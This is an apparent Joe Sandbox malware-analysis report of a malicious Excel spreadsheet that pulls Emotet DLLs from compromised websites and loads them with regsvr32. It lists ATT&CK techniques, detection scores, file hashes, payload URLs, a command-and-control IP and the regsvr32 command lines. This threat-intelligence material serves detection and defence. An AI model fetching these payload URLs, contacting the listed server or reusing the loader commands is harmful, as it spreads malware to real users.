Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74F3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74FBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF706BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7063280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Scripting; 2 Native API; 43 Exploitation for Client Execution; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 111 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 131 Masquerading; 1 Disable or Modify Tools; 1 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Scripting; 1 Hidden Files and Directories; 2 Obfuscated Files or Information; 1 Regsvr32
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Query Registry; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 16 System Information Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 13 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 22 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
[Behavior graph: ID 632101, sample Datei_26744565.xls, start date 23/05/2022, architecture WINDOWS, score 100]

Source | Detection | Scanner | Label
Datei_26744565.xls | 39% | ReversingLabs | Document-Excel.Trojan.Abracadabra

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\uxevr3.ocx | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll | 100% | Joe Sandbox ML |
C:\Users\user\uxevr1.ocx | 100% | Joe Sandbox ML |
C:\Users\user\uxevr4.ocx | 100% | Joe Sandbox ML |
C:\Users\user\uxevr2.ocx | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 29% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | 61% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\uxevr1.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\uxevr2.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\uxevr3.ocx | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\uxevr4.ocx | 29% | Metadefender |
C:\Users\user\uxevr4.ocx | 61% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\AnDDvm\lwQjfM.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) | 29% | Metadefender |
C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) | 61% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy) | 59% | ReversingLabs | Win64.Trojan.Emotet

Source | Detection | Scanner | Label
9.2.regsvr32.exe.450000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
6.2.regsvr32.exe.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
4.2.regsvr32.exe.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
10.2.regsvr32.exe.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
7.2.regsvr32.exe.2e0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
5.2.regsvr32.exe.4f0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
3.2.regsvr32.exe.1fe0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
8.2.regsvr32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

Source | Detection | Scanner | Label
kolejleri.com | 12% | Virustotal |
milanstaffing.com | 7% | Virustotal |
learnviaonline.com | 9% | Virustotal |
stainedglassexpress.com | 5% | Virustotal |

Source | Detection | Scanner | Label
http://learnviaonline.com/wp-admin/qGb/ | 14% | Virustotal |
http://learnviaonline.com/wp-admin/qGb/ | 100% | Avira URL Cloud | malware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.comodoc | 0% | Avira URL Cloud | safe
http://milanstaffing.com/images/D4TRnDubF/ | 13% | Virustotal |
http://milanstaffing.com/images/D4TRnDubF/ | 100% | Avira URL Cloud | malware
http://kolejleri.com/wp-admin/REvup/ | 18% | Virustotal |
http://kolejleri.com/wp-admin/REvup/ | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://165.22.73.229:8080/ | 0% | Avira URL Cloud | safe
https://165.22.73.229/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
https://165.22.73.229/E& | 0% | Avira URL Cloud | safe
https://secure.comodo.co | 0% | Avira URL Cloud | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://crl.com | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://165.22.73.229:8080/4 | 0% | Avira URL Cloud | safe
https://165.22.73.229:8080/0 | 0% | Avira URL Cloud | safe
https://165.22.73.229/d | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
kolejleri.com | 85.114.142.153 | true | true | | unknown
milanstaffing.com | 107.189.3.39 | true | false | | unknown
learnviaonline.com | 103.171.181.223 | true | false | | unknown
stainedglassexpress.com | 66.71.247.68 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://learnviaonline.com/wp-admin/qGb/ | true | 14%, Virustotal; Avira URL Cloud: malware | unknown
http://milanstaffing.com/images/D4TRnDubF/ | true | 13%, Virustotal; Avira URL Cloud: malware | unknown
http://kolejleri.com/wp-admin/REvup/ | true | 18%, Virustotal; Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            85.114.142.153 | kolejleri.com | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true
                            103.171.181.223 | learnviaonline.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false
                            107.189.3.39 | milanstaffing.com | United States | 53667 | PONYNETUS | false
                            165.22.73.229 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
                            66.71.247.68 | stainedglassexpress.com | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | false
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:632101
                            Start date and time:2022-05-23 09:49:07 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Datei_26744565.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@17/18@4/5
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 57.8% (good quality ratio 31.8%)
                            • Quality average: 33.7%
                            • Quality standard deviation: 37.7%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 38
                            • Number of non-executed functions: 250
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Adjust boot time
                            • Enable AMSI
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            Time | Type | Description
                            09:50:23 | API Interceptor | 3775x Sleep call for process: regsvr32.exe modified
                            Match | Associated Sample Name / URL | Detection
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll | DETAILS 25922194612.xls | malicious
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll | DETAILS 25922194612.xls | malicious
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll | DETAILS 25922194612.xls | malicious
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61480
                                  Entropy (8bit):7.9951219482618905
                                  Encrypted:true
                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.126909434994818
                                  Encrypted:false
                                  SSDEEP:6:kKFOd/qoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:4WkPlE99SNxAhUesE1
                                  MD5:6F6E56068B5F93A7328A3E3A7C1DF737
                                  SHA1:1057DF246C738374E3C5B86A77F13E800239CCB3
                                  SHA-256:F1A45EB0EFF076D3390202214578B9536CA72FD2FDBD8AAC1D667A7F74FCE1A8
                                  SHA-512:61571956F80935CAA866D3ACE0C7079A4E4DA1AA784B49108B97A32778A88CE666F6FC2E79DCC6F989D50A0BB9C122235CA2BC3A93D7E2C1CEB700452BEFBA11
                                  Malicious:false
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.1527203772082135
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                                  MD5:828A9B1007DC45671D8A58E240C7C973
                                  SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                                  SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                                  SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.152718217466625
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                                  MD5:646CA94D40F268C87215FFEA9FD0E826
                                  SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                                  SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                                  SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                  • Antivirus: ReversingLabs, Detection: 61%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://milanstaffing.com/images/D4TRnDubF/
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.152704988682108
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                                  MD5:5A9E3E501F04B27A38BCA881A68A1785
                                  SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                                  SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                                  SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://kolejleri.com/wp-admin/REvup/
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.1527177644825635
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                                  MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                                  SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                                  SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                                  SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  IE Cache URL:http://learnviaonline.com/wp-admin/qGb/
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61480
                                  Entropy (8bit):7.9951219482618905
                                  Encrypted:true
                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                  Malicious:false
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):162196
                                  Entropy (8bit):6.301436092020807
                                  Encrypted:false
                                  SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                  MD5:E721613517543768F0DE47A6EEEE3475
                                  SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                  SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                  SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                  Malicious:false
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.440608621024532
                                  Encrypted:false
                                  SSDEEP:768:cDRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+V0qs9s1X8:cVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UU
                                  MD5:A406AA1773C3292E4769B91791FEA502
                                  SHA1:42B4155CFEAC777DD81ED4D6847BD29DF7D63810
                                  SHA-256:1035D746F889351ED4258FBFC62EEDD75409A3CF4DEC52D81CE1C162CB5210DC
                                  SHA-512:CCFC0521C6B9D6C67911139131AF133D7C7047CE3485526E7898B598ABB370587EA7DB8D006BE52274E92A744C5D812110FB4AD141D07C2B5966820AE3B83AA4
                                  Malicious:false
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 07:48:11 2022, Security: 0
                                  Category:dropped
                                  Size (bytes):69120
                                  Entropy (8bit):6.427895409240265
                                  Encrypted:false
